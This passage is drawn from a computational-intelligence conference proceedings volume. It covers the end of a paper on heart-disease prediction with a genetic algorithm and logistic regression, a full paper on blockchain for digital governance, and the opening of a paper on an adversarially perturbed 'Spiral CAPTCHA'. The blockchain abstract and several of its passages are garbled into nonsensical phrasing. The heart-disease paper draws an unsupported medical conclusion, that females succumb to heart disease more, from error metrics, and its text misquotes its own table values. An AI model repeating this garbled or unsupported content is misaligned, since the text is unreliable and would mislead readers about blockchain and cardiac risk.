during the classification procedure. The classification process consists of two stages,
namely training and testing phases. At the training stage, the model is trained on the
training data. After training stage, we use the trained model on the test data for the
prediction of the target attribute value.
Using the classification model, we can obtain the relationship between predictor
attribute value and the corresponding class to which it belongs. In the testing phase,
the actual class of the just-classified example is predicted. Since the data in the test
data set were not seen during training, the measured prediction accuracy is a reliable
estimate of performance. The knowledge learned by a classification model can be described
in the form of decision trees, artificial neural networks, and association rule learning, to name a few.
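As a minimal, self-contained illustration of this two-stage procedure, the sketch below splits a data set into disjoint training and test parts, trains a classifier on the training part and predicts the target attribute for the unseen test examples; the synthetic data and the use of scikit-learn's logistic regression are our own choices, not the paper's.

from sklearn.datasets import make_classification
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score

# Synthetic stand-in for a data set with 13 predictor attributes and a binary class
X, y = make_classification(n_samples=303, n_features=13, random_state=0)

# Disjoint training and test data sets
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)

model = LogisticRegression(max_iter=1000)
model.fit(X_train, y_train)             # training phase
y_pred = model.predict(X_test)          # testing phase on unseen examples
print("test accuracy:", accuracy_score(y_test, y_pred))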

4 Classification Methods

In the proposed work, we consider an important method for classification, namely
an artificial neural network combined with a genetic algorithm.

4.1 Artificial Neural Network

The artificial neural network is a perceptron neural network that can consist of
multiple layers. The single-layer perceptron with no hidden layers can solve only
problems which are linearly separable. But many recent real-time
problems are not linearly separable and are also complex. To solve such problems, multi-
layer neural networks with one or more hidden layers are to be added between the
input and output layer with error functions. These multilayer perceptron networks
are also known as feed-forward neural network. These multilayer neural networks
are used for medical image and data diagnostics, pattern recognition, classification
of input patterns, and autonomous vehicle.

4.2 Genetic Algorithm

Genetic algorithms are an evolutionary optimization learning approach for performing
classification. They work on the principle of the human reproduction process along
with the process of evolution. Genetic algorithms perform searching and producing
the fittest candidates as the solution using survival of fittest principle. These selected
individuals are then adapted to their new environment. Every chromosome or genome
in the population is represented using bit strings or gray codes. These genomes
encode phenotype which is the candidate solutions represented in 0 or 1. The evolu-
tion process starts selecting individual’s randomly among biological population. At
each iteration, the fitness value of each individual is collected, the fittest individuals
are selected, and the population is modified accordingly. The iterations in the algo-
rithm continue until a termination condition namely maximum generations have been
produced or a satisfactory fitness level is reached. GA requires the following, first
representation of the solution domain using genetics. Then a fitness function for eval-
uation of the solution domain is obtained. Unlike other classification models, genetic
algorithms can solve continuous or discrete variable nonlinear complex optimization
design problem without the need of gradient information.
The basic objective of a genetic algorithm is to combine the fittest and most qualified
members of the current generation to produce even more qualified offspring. During the repro-
duction process, members are selected based on the fitness criteria. During this
process, the fittest and most compatible individuals of the current generation will prob-
ably generate the next population. Roulette wheel and stochastic universal sampling
(SUS) are some of the selection operators used during the algorithm. The main opera-
tors of genetic algorithms, namely reproduction, crossover, and mutation, are performed
to improve the fitness function.
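A minimal sketch of these operators for a feature-selection setting, where each chromosome is a boolean mask over the attributes, is given below; the population initialization, the rank-based selection and all rates shown are illustrative assumptions, not the exact settings of the proposed work.

import numpy as np

rng = np.random.default_rng(0)

def init_population(size, n_feat):
    # each chromosome is a boolean mask selecting a subset of features
    return rng.random((size, n_feat)) > 0.3

def select(pop, fitness, n_parents):
    # survival of the fittest: keep the n_parents best chromosomes
    order = np.argsort(fitness)[::-1]
    return pop[order[:n_parents]]

def crossover(parents, size):
    # single-point crossover between randomly paired parents
    children = []
    while len(children) < size:
        a, b = parents[rng.integers(len(parents), size=2)]
        cut = rng.integers(1, parents.shape[1])
        children.append(np.concatenate([a[:cut], b[cut:]]))
    return np.array(children)

def mutate(pop, rate):
    # flip a small fraction of genes to keep the search exploring
    flips = rng.random(pop.shape) < rate
    return np.where(flips, ~pop, pop)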

5 Feature Engineering

Data set repository for heart disorder from UCI is used for the process of classifi-
cation. Training and test data sets are obtained by segregating the data set. During
feature engineering, we consider suitable attributes for training the model. The trained
classification model is then used to predict the class of the examples in the test data.

The problem statement is described as follows:


To predict the presence of heart-related disorders among patients using a Genetic
Algorithm.

The feature attributes contributing to the prediction of heart disease are defined
as data fields as shown below.
The data set has the following attributes as data fields,
c_age—This characteristic feature of the attribute indicates the age in terms of
number of years.
c_sex—The characteristics of this feature indicate the sex of the patient, specified
in male and female with a value of 1 and 0, respectively.
c_cp—The characteristics of this feature indicate the chest pain category: typical
angina, atypical angina, non-anginal pain, and asymptomatic, with values 1, 2, 3, and
4, respectively.
c_trestbps—The value of BP at rest when the patient is admitted. It is measured
in mm/Hg.
c_chol—The feature is used for serum cholesterol measured in mg/dl.
c_fbs—It represents the level of fasting blood sugar. It is true or 1 when the
measured fasting blood sugar is more than 120 mg/dl otherwise considered to be
false or 0.
c_restecg—Specified as 0 for normal and 1 for ST-T wave abnormality with
inversion of the T wave and/or elevation or depression of ST by >0.05 mV. Definite
observation of left ventricular hypertrophy by Estes' criteria is represented by a
value of 2.
c_thalach—This attribute specifies the maximum heart rate achieved by the
person.
c_exang—The characteristic feature of this attribute indicates exercise-induced
angina, with a value of 1 for yes and 0 for no.
c_oldpeak—The characteristic feature of this attribute is for ST depression made
by exercise relative to rest.
c_slope—Represents the slope of the peak exercise ST segment, indicated by values
of 1, 2, and 3 for up-sloping, flat, and down-sloping, respectively.
c_ca—The count of major vessels (from 0 to 3) colored by fluoroscopy.
c_num—This attribute represents the presence of heart disorder in the person and is the prediction target.
Out of the 303 tuples in the Cleveland heart disease data set from the UCI repository,
212 examples are used during the training phase and the others are used as
records in the test data. The data set for training and test data is created using Python
code as shown in Eq. (1),

train = df.iloc[0:212, :]    (1)

The Python statements used to train the model with the genetic algorithm are given in
Eqs. 2 and 3 below. In Eq. 2, the logistic model (logmodel) is fitted, and in Eq. 3, the genetic
model is developed.
 
logmodel.fit(X_train.iloc[:, chromo[-1]], y_train)    (2)

chromo, score = generations(size=100, n_feat=10, n_parents=5,
                            mutation_rate=0.05, n_gen=4,
                            X_train=X_train, X_test=X_test,
                            y_train=y_train, y_test=y_test)    (3)
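The generations routine referred to in Eq. 3 is not listed in the paper; the sketch below is one plausible reading that uses the logistic model of Eq. 2 as the fitness function together with the GA operators sketched in Sect. 4.2. All names and settings here are illustrative assumptions.

import numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score

def generations(size, n_feat, n_parents, mutation_rate, n_gen,
                X_train, X_test, y_train, y_test):
    logmodel = LogisticRegression(max_iter=1000)
    pop = init_population(size, n_feat)          # operators from the Sect. 4.2 sketch
    chromo_hist, score_hist = [], []
    for _ in range(n_gen):
        scores = []
        for mask in pop:                         # fitness: accuracy of the Eq. 2 model
            logmodel.fit(X_train.iloc[:, mask], y_train)
            scores.append(accuracy_score(y_test, logmodel.predict(X_test.iloc[:, mask])))
        scores = np.array(scores)
        best = int(np.argmax(scores))
        chromo_hist.append(pop[best])            # so chromo[-1] is the best final mask
        score_hist.append(scores[best])
        parents = select(pop, scores, n_parents)
        pop = mutate(crossover(parents, size), mutation_rate)
    return chromo_hist, score_hist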

5.1 Performance Measures

The three performance measures used in this work for predictive analysis are the mean
absolute error (MAE), which is obtained by calculating the mean of the absolute
differences between the actual and predicted values, the mean squared error (MSE),
and the root mean squared error (RMSE).
MAE is given by,

MAE = (1/n) ∑_{i=1}^{n} |y_i − o_i|    (4)

In Eq. 4, MAE is the mean absolute error, yi is the ith actual data set, and oi is the
ith predicted data set value.
RMSE is defined as the square root of the average of squared errors. It is given
by,


 
RMSE = √((1/n) ∑_{i=1}^{n} (f_i − o_i)²)    (5)

In Eq. 5, the root mean square error is represented by RMSE, n indicates the number of
examples, f_i is the ith predicted value, and o_i is the actual value.
MSE is calculated by finding the mean of the squared differences between the actual
target and predicted values of the tuples in the data set.

MSE = (1/n) ∑_{i=1}^{n} (y_i − o_i)²    (6)

In Eq. 6, MSE is the mean squared error, y_i is the ith actual instance value in the
data set, o_i is the ith predicted instance value, and n indicates the number
of test samples.
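The three measures of Eqs. 4–6 can be computed directly with NumPy, as in the short sketch below; the function names are our own.

import numpy as np

def mae(y_true, y_pred):
    return np.mean(np.abs(y_true - y_pred))      # Eq. 4

def mse(y_true, y_pred):
    return np.mean((y_true - y_pred) ** 2)       # Eq. 6

def rmse(y_true, y_pred):
    return np.sqrt(mse(y_true, y_pred))          # Eq. 5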

6 Prediction Analysis

In this study of prediction analysis, preprocessing of data set is done first. After
preprocessing, we evaluate the mean of the attribute values for representing the
missing data. The performance measures used during the prediction process are
namely MAE, RMSE, and MSE. These measures are calculated using the training
and test models on the heart disease data set. Observing Table 1, the value of MAE
is lesser than MSE and RMSE. In Table 2, we find the MAE and MSE are minimum
when c_sex is female with values of 0.44 and 1.06, respectively. Thus, when c_sex
attribute represents female, the model performs better prediction.
Now looking at Table 3, we observe that when c_cp equals 1, MAE and MSE
have lower values of 0.29 and 0.29, respectively. Thus, the c_cp attribute contributes to the
improved prediction accuracy of the model. Deviation from the actual values is observed
in the prediction model when MAE and MSE have their highest values of 0.95 and 2,
respectively. Now analyzing the contents of Table 4, we observe that MAE and MSE

Table 1 Values of MAE, MSE, and RMSE for the overall data set

Error_type    Value
MAE           0.62
MSE           1.21
RMSE          1.1

Table 2 Values of MAE, MSE, and RMSE for the male and female categories using attribute c_sex

Error_type    Value for male with c_sex = 1    Value for female with c_sex = 0
MAE           0.81                             0.44
MSE           1.59                             1.13
RMSE          1.26                             1.06

Table 3 Values of MAE, MSE, and RMSE for different values of attribute c_cp

Type_of_error    c_cp = 1    c_cp = 2    c_cp = 3    c_cp = 4
MAE              0.29        0.33        0.36        0.95
MSE              0.29        0.73        0.92        2
RMSE             0.53        0.86        0.96        1.41

Table 4 Values of MAE, MSE, and RMSE for different values of attribute c_slope

Type of error    c_slope = 1    c_slope = 2    c_slope = 3
MAE              0.55           0.76           0.50
MSE              1              1.71           0.50
RMSE             1              1.31           0.71

have minimum values of 0.50 and 0.50, respectively, when the c_slope attribute is 3. In
this case, the prediction model provides better accuracy. When c_slope has a value
of 2, MAE and MSE have their highest values of 0.76 and 1.71, respectively, as shown in Table
4. This makes the prediction model deviate from the actual values. MAE has a
low value of 0.29 under the consideration of the attributes c_sex, c_cp and c_slope.
This occurs when c_cp has a value of 1. Thus, the attribute c_cp provides better
prediction. We also obtain a minimum RMSE value of 0.53 when the attribute
c_cp has a value of 1.

7 Conclusion

In this paper, genetic algorithm is utilized in predicting heart disease among patients.
We have used the data set on heart disease available at the UCI machine learning
repository. Performance measures namely MSE and RMSE are calculated using
feature engineering technique on the attributes of the heart disease data set. The male
and female attribute in the data set is also analyzed. The RMSE consistency measures indi-
cate that females succumb to heart disease more than males. In future, the accu-
racy of the prediction can be improved by utilizing other machine learning methods
such as deep neural networks and association rule mining with other performance
measures.

References

1. Yekkala, I., & Dixit, S. (2018). Prediction of heart disease using random forest and rough set
based feature selection. International Journal of Big Data and Analytics in Healthcare, 3(1),
1–12.
2. Bhuvaneswari Amma, N. G. (2012). Cardiovascular disease prediction system using genetic
algorithm and neural network. In International Conference on Computing, Communication
and Applications, Dindigul, Tamilnadu, India (pp. 1–5). IEEE.
3. Gupta, A., et al. (2020). A machine intelligence framework for heart disease diagnosis. IEEE
Access, 8, 14659–14674.
4. Purushottam, K. S., & Sharma, R. (2016). Efficient heart disease prediction system. Procedia
Computer Science, 85, 962–969.
5. Arabasadi, Z., Alizadehsani, R., Roshanzamir, M., Moosaei, H., & Yarifard, A. A. (2017).
Computer aided decision making for heart disease detection using hybrid neural network-
Genetic algorithm. International Journal of Computer Methods and Programs in Biomedicine,
141, 19–26.
6. Acharyaa, U. R., Sudarshana, V. K., Koha, J. E. W., Martis, R. J., Tana, J. H., Oha, S. L.,
Muhammada, A., Hagiwaraa, Y., Mookiaha, M. R. K., Chuaa, K. P., Chuaa, C. K., & Tane,
R. S. (2017). Application of higher-order spectra for the characterization of Coronary artery
disease using electrocardiogram signals. Biomedical Signal Processing and Control, 31, 31–43.
7. Ali, S. A., Raza, B., Kamran, A., Malik, Shahid, A. R., Faheem, M., Alquhayz, H., & Kumar, Y.
J. (2020). An optimally configured and improved deep belief network (OCI-DBN) approach for
heart disease prediction based on Ruzzo–Tompa and stacked genetic algorithm. IEEE Access,
8, 65947–65958.

8. Yekkala, I., & Dixit, S. (2020). A novel approach for heart disease prediction using genetic
algorithm and ensemble classification. In Proceedings of SAI Intelligent Systems Conference,
Intelligent Systems and Applications (pp. 468–489). Springer.
9. Amin, M. S., Chiam, Y. K., & Varathan, K. D. (2019). Identification of significant features and
data mining techniques in predicting heart disease. Telematics and Informatics, 36, 82–93.
10. Wiharto, H. K., & Herianto, H. (2017). Hybrid system of tiered multivariate analysis and arti-
ficial neural network for coronary heart disease diagnosis. International Journal of Electrical
and Computer Engineering (IJECE), 7(2), 1023–1031. ISSN 2088-8708. https://doi.org/10.
11591/ijece.v7i2.pp1023-1031.
11. Alzubi, O. A., Alzubi, J. A., Alweshah, M., Qiqieh, I., Al-Shami, S., & Ramachandran,
M. (2020). An optimal pruning algorithm of classifier ensembles: Dynamic programming
approach. Neural Computing and Applications. https://doi.org/10.1007/s00521-020-04761-6.
12. Alzubi, O. (2020). Deep learning-based intrusion detection model for industrial wireless sensor
networks. Journal of Intelligent & Fuzzy Systems, In press.
13. Gupta, D.,Rodrigues, J. J. P. C., Sundaram, S., Khanna, A., Korotaev, V., & Albuquerque,
V. H. C. (2018). Usability feature extraction using modified crow search algorithm: A novel
approach. Neural Computing and Applications. https://doi.org/10.1007/s00521-018-3688-6.
Secured Information Infrastructure
for Exchanging Information for Digital
Governance

Mohd Shukri Alias and S. B. Goyal

Abstract The information infrastructure should be secure to trade in the design of


visual management. A secure blockchain management device can protect integrated
statistics, simpler methods and save you from fraud, garbage, and harassment to
improve compliance and accountability for real exchanges. Individuals, groups, and
governments are collaborating on the distribution of digital-enabled virtual reality
using cryptography on a government-based blockchain that removes the single point of
failure and apparently protects the realities of the citizen concerned and the authori-
ties. Desire to reduce calls needs to be eliminated by making available adoptions to
control gadget use of the public blockchain to facilitate cross-border or record sharing
and reduce environmental waste by eliminating virtual garage space demand with
virtual management and protecting a different visibility and number system. The
keys to the measurable areas considered in this consideration are considered real
and reliable in the control of facts. Seeking different facts through people to study
development into automated security solutions to transform digital governance data
into a wide range of financial areas includes system performance, content testing and
Internet of Things (IoT), and online-based ownership. As a result, blockchain tech-
nology can improve the credibility of public institutions that use fraudulent systems
to store information. The blockchain technology allows for the exclusion of social
and fashion contexts of dialogue, as it can create realistic balance in the ecosystem
of corporations and actors across borders.

Keywords Information infrastructure · Digital governance · Blockchain


technology

M. S. Alias (B) · S. B. Goyal


City University, Petaling Jaya, Selangor, Malaysia

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_5

1 Introduction

1.1 Definition of Blockchain

Blockchains, which were proposed in 2008 by Satoshi Nakamoto for the
monetary sector [1], are considered to be one of the extensive, disruptive fourth indus-
trial revolution technologies [2]. Blockchain is described as a record of transactions,
secured by cryptography, that is shared in a peer-to-peer network across several computers.
Blockchain uses an asymmetric cryptography mechanism to confirm the authen-
ticity of transactions [3]. In general, blockchain allows transactions to be exchanged
effectively between two or more parties in a virtual decentralized ledger without the
need for intermediaries [4]. A blockchain is a distributed ledger that accomplishes the
following:
i. Records any transaction or data securely, completely, and unmodified.
ii. Makes use of one-way hash cryptography that is computationally imprac-
tical to break.
iii. Is visible to all users with permission.
iv. Makes use of peer-to-peer transmission, with each node forwarding new
transactional data to all others.
v. Can trigger transactions automatically, based on business logic
and custom algorithms.
vi. Verifies transactions via node consensus without reliance on third-
party intermediaries.

1.2 Blockchain Technology

Blockchain is considered to be a highly advanced technology that attracts many
industries and services. Blockchain technology is a decentralized, peer-to-peer
arrangement with a publicly visible ledger. It can be used for databases or transactions
in a distributed environment without the involvement of a third party. Blockchain is a
well-known and widely used form of distributed ledger technology. A blockchain is an
organization of ledgers in which transactions made with a certain asset (cryptocurrencies,
tokens, or data) are arranged in sequence in blocks. Each block contains a signature
computed over the data of that block. The consecutive block contains this
signature, linking all previous blocks with each other back to the first block. Blocks
are built and registered throughout the peer-to-peer network, using cryptographic
primitives and authentication methods of the underlying system.
Blockchain technology allows machine operators (known as nodes) to run on
a peer-to-peer (p2p) network and records transactions in a way that is
distributed across the network [5]. A transaction record includes the owners of the
assets involved and the transaction itself. Transactions are verified by the network
through a "consensus method," which allows p2p network clients to verify trans-
actions and update the ledger across the network [6]. The consensus mechanism is used
to establish trust in the accuracy of data on a system that has historically been maintained
by a central party or administrator. A consensus approach is a
process in which nodes in a shared network agree on proposed activities. This
implementation provides a way of keeping records within a ledger that
ensures a complete transaction history and consistency. Permission methods are further governed
by network governance regulations and agreements that allow for documenta-
tion, finalization, and execution of transactions subject to certain conditions. There-
fore, each transaction can be agreed upon, creating a chain of transactions similar to
a ledger. In blockchains, batches of transactions are integrated into a block that is linked
to the previous block. Within the context of Bitcoin, after a fixed time interval, a
new block containing the latest transactions is created and verified throughout the
network. These records form a series of blocks, also
known as a blockchain.
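To make the block-linking idea concrete, the toy Python sketch below chains blocks by storing each block's hash in its successor, so altering any earlier record breaks every later signature. It is only an illustration of the hashing principle under our own simplified block format, not a description of any particular blockchain implementation.

import hashlib
import json
import time

def make_block(transactions, prev_hash):
    # a block records its own data together with the hash of the previous block
    block = {"timestamp": time.time(),
             "transactions": transactions,
             "prev_hash": prev_hash}
    block["hash"] = hashlib.sha256(json.dumps(block, sort_keys=True).encode()).hexdigest()
    return block

chain = [make_block(["genesis"], prev_hash="0" * 64)]
chain.append(make_block(["Alice pays Bob 5"], prev_hash=chain[-1]["hash"]))
chain.append(make_block(["Bob pays Carol 2"], prev_hash=chain[-1]["hash"]))
# Tampering with chain[1] would change its hash and break the link stored in chain[2].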

1.3 Smart Contract

Another key factor supported by using more than one blockchains is smart contracts.
Intelligent contracts are parts of software that perform different functions depending
on the state of the machine or on events that occur. A smart contract is a computer appli-
cation or protocol that assists, validates, or enforces the terms of an agreement
[7]. Smart contracts are deployed on the distributed ledger. They execute without requiring
human intervention. With built-in conditions, smart contracts typically automate financial
arrangements, triggering events and cryptocurrency transactions without
intentional or unintentional errors [8]. Smart contracts can be seen as non-public
regulatory bodies that refer to a set of rules that govern transactions between inter-
ested parties. Once set, smart contracts do not change and are binding, causing, but
not resolved, the problem of dealing with damage caused by malfunction or code
errors. The smart contract is in official objective sentences. In an integrated system,
the right motive can be judged through a mediator in the event of a dispute. However,
in an invalid blockchain gadget, there is no separate arbitrator, and personal purpose
cannot be detected by entering computer codes. While it may not completely solve
the problem of seeking a superior arbitrator, the personal blockchain gadget can grant
rights to test programs and will no doubt be accurate or refuse certain transactions.
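As a purely conceptual analogy for rules that execute without human intervention, the hypothetical Python sketch below models a toy escrow-style agreement; it is not code for any particular blockchain platform, and every name in it is invented for illustration.

```python
class EscrowContract:
    """Toy escrow: funds are released only once the agreed condition holds."""

    def __init__(self, buyer, seller, amount):
        self.buyer, self.seller, self.amount = buyer, seller, amount
        self.delivered = False
        self.settled = False

    def confirm_delivery(self, reporter):
        # Only the buyer may confirm delivery; the rule is fixed in code.
        if reporter == self.buyer:
            self.delivered = True

    def settle(self, ledger):
        # Executes automatically once the encoded condition is satisfied.
        if self.delivered and not self.settled:
            ledger.append((self.buyer, self.seller, self.amount))
            self.settled = True
        return self.settled


ledger = []
contract = EscrowContract("alice", "bob", 10)
contract.settle(ledger)             # nothing happens: condition not met
contract.confirm_delivery("alice")
contract.settle(ledger)             # payment recorded without an intermediary
print(ledger)                       # [('alice', 'bob', 10)]
```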

1.4 Distributed Ledger Technology

Distributed ledger technology (DLT) maintains a growing, time-ordered list of cryptographically signed, immutable transaction records distributed among all participants. Agreements are supported by an infrastructure that allows computers in various locations to propose and validate transactions and to record data in a consistent manner across the network. Any participant with the appropriate access rights can retrieve the current state, or any point in its history, from any actor in the network, with transactions secured through public-key cryptography. Exchanges are settled directly between the peers involved and are consistently verified using algorithms across the network.

1.5 Types of Blockchain

Blockchains can be regarded as decentralized systems comprising a variety of participants who act according to their own incentives and the information available to them [9]. Each blockchain network serves its own purpose and solves particular problems, and each has its own features and advantages. Depending on use and requirements, blockchains are divided into three types:
i. Public blockchain: The ledger is visible to everyone online, and anyone can verify and add transactions.
ii. Private blockchain: Only designated people within the organization can verify and add transactions, although everyone on the network may be allowed to view the ledger.
iii. Consortium blockchain: A selected group of organizations (for example, banks) can validate and add transactions, and the ledger can be open or restricted to selected participants.

2 Literature Survey

2.1 Digital Governance (E-governance)

Digital governance, formerly known as e-governance, refers to the use of ICT to promote modern, efficient, and effective governance and to facilitate access to governance information and services. It covers the application of ICT in public-sector administration, which can transform public services and processes. E-governance is a broad term that encompasses the operation of national institutions, electoral processes, and the relationship between government and the general public. Digital governance has organizational, administrative, and technical aspects in eight broad categories:
i. Governance-to-citizen: Provides public online services, especially electronic delivery of services related to transactions and information exchange.
ii. Citizen-to-governance: Allows the general public to submit information and requests online, especially electronic interactions involving transactions and communications.
iii. Governance-to-business: Helps to drive e-transaction initiatives, such as e-purchasing.
iv. Business-to-governance: Assists in the implementation of e-transaction projects, including e-procurement.
v. Governance-to-worker: Introduces initiatives such as e-career programs and paperless processes in the e-office.
vi. Governance-to-governance: Allows government departments or agencies to collaborate and interact online over shared government databases.
vii. Governance-to-non-profit: The exchange of information and communication between government, the legislature, non-profit organizations, political parties, and civil society organizations.
viii. Non-profit-to-governance: The exchange of information and communication from non-profit organizations, political parties, and civil society organizations toward government and the legislature.

2.2 Benefits of Applying Blockchain Technology in Governance

Digital governance represents a paradigm shift at the technology level of public administration. In the past, the concept of e-government used digitalization to a lesser extent, as an input to or a modern wrapper around public administration. Digital governance goes a step further and focuses on the provision of user-friendly, fast, and modern public services. These services and service-delivery models must combine digital governance technology with the realities of citizens. Blockchain is one of the most advanced digital technologies that should be considered under new policies for governance and service delivery. The benefits of using blockchain technology in governance include:
i. Reduced financial cost, time, and procedural complexity in managing financial and other private records, which strengthens the governance capability of government.
ii. Reduced paperwork, disputes, and corruption, resulting from the use of distributed ledgers and programmable smart contracts.
iii. Increased automation, guaranteed transparency, and accountability of the information held in the registry, for the benefit of citizens.
iv. Increased trust of citizens and organizations in governance and record-keeping practices, since these are carried out by algorithms that are not controlled by a single administrator.

3 Problem Statement

This paper aims to clarify how blockchain technology has been researched in digital governance by conducting a systematic review following the guide of Okoli and Schabram [2]. The guide prescribes specific activities, including the development of a review protocol that covers subject selection, data extraction, and the reporting of results, and it serves as a basis for answering the following research questions:
i. How has blockchain technology been researched in the context of digital governance?
ii. What opportunities, challenges, and consequences have been identified in studies on blockchain technology for digital governance?
iii. How could blockchain technology benefit public administration in the context of reform frameworks?
iv. What are the current public administration reform frameworks?
v. How does blockchain fit into the narrative of contemporary public administration reform frameworks?
vi. What are the potential use cases of blockchain in the context of public administration?

4 Hypothesis

Security requirements change rapidly in systems distributed across specialized organizations, as each organization wants a better way to manage access rights under its own regulations [6]. With centralized structures, organizations typically grant and revoke access rights to data held on central servers, and system integration controls user permissions through internal authentication [5]. The conceptual hypotheses investigated in this paper are:
i. Adopting blockchain technology significantly improves the efficiency and security of the record infrastructure in digital governance.
ii. Blockchain technology has a positive effect on the relationship between the access control system and the e-governance system.
iii. Smart contracts have a positive effect on the relationship between the access control system and the benefits to public administration.
iv. Distributed ledger technology has a positive effect on the relationship between the access-controlled infrastructure and digital governance data.
v. Blockchain technology reorganizes how records are formally regulated within governance frameworks.

5 Methodology

Distributing administrative authority through permissioned blockchains is effective and attractive because it can greatly improve how policies are enforced across a community. As mentioned earlier, blockchain technology is built on four main concepts. These are:
i. The platform itself is distributed, so the data contained in the ledger is widely available, which improves availability and resilience to failures and tampering.
ii. The ledger record can be plain text, fully encrypted, or split into smaller elements, each encrypted with a different key, allowing flexible models for disclosing the data.
iii. The individual records in the ledger are immutable; once a record has been created, any change to it disturbs the computed hash code that links each block to the previous block, breaks the "chain," and reveals the inconsistency.
iv. The method used to append records involves some form of consensus and can, in a sense, be considered "democratic," in that the majority of participants determine which transactions are true and correct.
Typically, in any given use case, a blockchain may be appropriate when three or four of the properties described above are important aspects of the use case. If only one or two are required, a blockchain may still work, but there may be simpler and less expensive ways to solve the problem. If only strong evidence, open access, or simple records are required, a standard data management structure may also meet the need. A well-provisioned blockchain allows a high volume of transactions to be completed in a seamless environment. The measurable factors considered in this study are:
i. Validity of data: An organization controls the extent to which data is correctly sourced and remains accurate when shared with the consumer.
ii. Governance of data: An organization has defined fair business rules to manage data and to align them with its business processes.
iii. Reliability of data: An organization acts consistently and proactively, in a timely, insight-driven way.

6 Expected Impact

Blockchain technology is a growing area of study that offers a variety of research opportunities, especially regarding the industrial value of blockchains in digital governance. Blockchains create accurate and immutable records in a single context across domains of governance (health care, commerce, stock markets, insurance, higher education, supply chains, asset management, and banking). These properties can also prove valuable for private businesses. Blockchain technology should be pursued by developing countries to reduce the digital divide and improve trade administration. Additional challenges and uncertainties introduced by blockchain technology and its technical aspects include security, stability, flexibility, usability, interoperability, computing performance, storage size, and cost efficiency.

7 Conclusion

Applications designed on blockchain will be able to reduce the cost of connecting devices and to move unstructured communities away from a single point of control, without a centralized authority being needed to change data across domains. In a smart environment, devices can increasingly operate on their own. As a result, routine work can be automated, operating costs reduced, and service delivery managed efficiently through a real-world blockchain. Blockchain distributes data so that the adverse effects of hacking can be minimized. Moreover, every action on the blockchain is recorded and visible to every user; under such comprehensive visibility, misbehavior becomes far less feasible.

References

1. Gartner. (2018). Preparing for smart contract adoption. Retrieved February 7, 2019 from
https://www.gartner.com/doc/3894102/preparing-smart-contractadoption
2. Okoli, C., & Schabram, K. (2011). A guide to conducting a systematic literature review of
information systems research. In Working Papers on Information Systems: Sprouts. ISSN 1535-
6078
3. Aitzhan, N. Z., & Svetinovic, D. (2018). Security and privacy in decentralized energy trading
through multi-signatures, blockchain and anonymous messaging streams. IEEE Transactions
on Dependable and Secure Computing, 15(5), 840–852.
4. Wright, A., & De Filippi, P. (2015). Decentralized blockchain technology and the rise of lex
cryptographia. SSRN.
5. Back, S. A., Corallo, M., Dashjr, L., Friedenbach, M., Maxwell, G., Miller, A., & Timón, J.
(2014). Enabling blockchain innovations with pegged sidechains. Open Science Review.
6. Ao, X., & Minsky, N. H. (2003). Flexible regulation of distributed coalitions. Lecture Notes
Computer Science, 2808, 39–60.
7. Swan, M. (2015). Blockchain: Blueprint for a new economy (1st edn). Safari Tech Books
Online. Beijing: O’Reilly.
8. Antonopoulos, A. M., & Wood, G. (2018). Mastering ethereum: Building smart contracts and
DApps (1st edn). Sebastopol: O’Reilly Media.
9. Hu, V. C., Ferraiolo, D. F. & Kuhn, D. R. (2006). Assessment of access control systems.
Interagency Report 7316, NIST.
10. Warburg, B. (2016). How the blockchain will radically transform the economy [TED talk].
Retrieved from https://www.youtube.com/watch?v=RplnSVTzvnU
Spiral CAPTCHA with Adversarial
Perturbation and Its Security Analysis
with Convolutional Neural Network

Shivani and C. Rama Krishna

Abstract Human or bot? This is the first question that comes to mind before deploying web services. A Completely Automated Public Turing test to tell Computers and Humans Apart (CAPTCHA) is a tool that is generally used to boost the security of web services by conducting a challenge-response test. This test helps to determine whether incoming requests come from legitimate users or intelligent bots. A bot finds it difficult to predict distorted words that a human can easily recognize. There are two major aspects of a CAPTCHA: it should be easily identified by humans, and it should be able to prevent bot attacks. This paper presents a new text-based CAPTCHA design called Spiral CAPTCHA with an immutable adversarial noise (IAN) and validates it using convolutional neural network (CNN) attacks. The new text-based "Spiral CAPTCHA" is designed using PHP, and a dataset of 16,384 images has been created. The proposed CAPTCHA has also been tested for its security against the convolutional neural network "AlexNet." For evaluation purposes, the CNN model was trained with a dataset containing 8027 images and validated using 3441 images. Testing of the model was performed by randomly choosing batches of 64, 128, 256, and 512 images from a testing dataset of 4916 images. To check robustness against recognition, we initially tested the CAPTCHA without any noise and later with noise. Finally, the proposed CAPTCHA is evaluated using recognition rate, recognition speed, attack speed, and success rate. The maximum recognition rate achieved for the CAPTCHA without perturbation is 38.48% and with perturbation is 13.50%. However, the success rate is very low (almost 0%) in both cases, which confirms that the proposed CAPTCHA is robust against recognition attacks.

Keywords CAPTCHA · CNN · Alexnet · Adversarial · IAN · Spiral

Shivani (B) · C. R. Krishna


Department of Computer Science Engineering, National Institute of Technical Teachers Training
and Research, Chandigarh, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_6

1 Introduction

Von Ahn et al. were the first to introduce the concept of CAPTCHA: a challenge-response human intelligence test that humans are expected to pass easily, unlike intelligent machines. It acts as a hurdle for bots or automated programs, preventing them from exploiting essential web services [1]. Humans can solve CAPTCHAs with about 90% accuracy, whereas bots can solve them with at most a 1% success rate, which makes CAPTCHAs a good security measure against malicious programs [2].
Major web services secured by CAPTCHAs include online registration forms, comments on blogs and websites, online polls, and email accounts. A machine by itself cannot identify whether a requester is a human or a bot. A typical CAPTCHA process involves a session in which automated challenges are generated by the system and presented to the user. The true identities of the responders (humans or bots) are hidden from the system, which identifies the user by analyzing the responses. Another approach is to provide questions that humans can solve easily but that are challenging for bots. Major question categories include object identification in a picture, image labeling, word recognition in speech, puzzle-solving, eye CAPTCHA, pedometric CAPTCHA, and text recognition. Among the various types of CAPTCHAs, text-based CAPTCHA is the most commonly used. It can be generated cheaply in virtually unlimited numbers without exhausting the challenge space, and text-based CAPTCHAs do not require any storage because they use simple combinations of alphanumeric symbols [3].
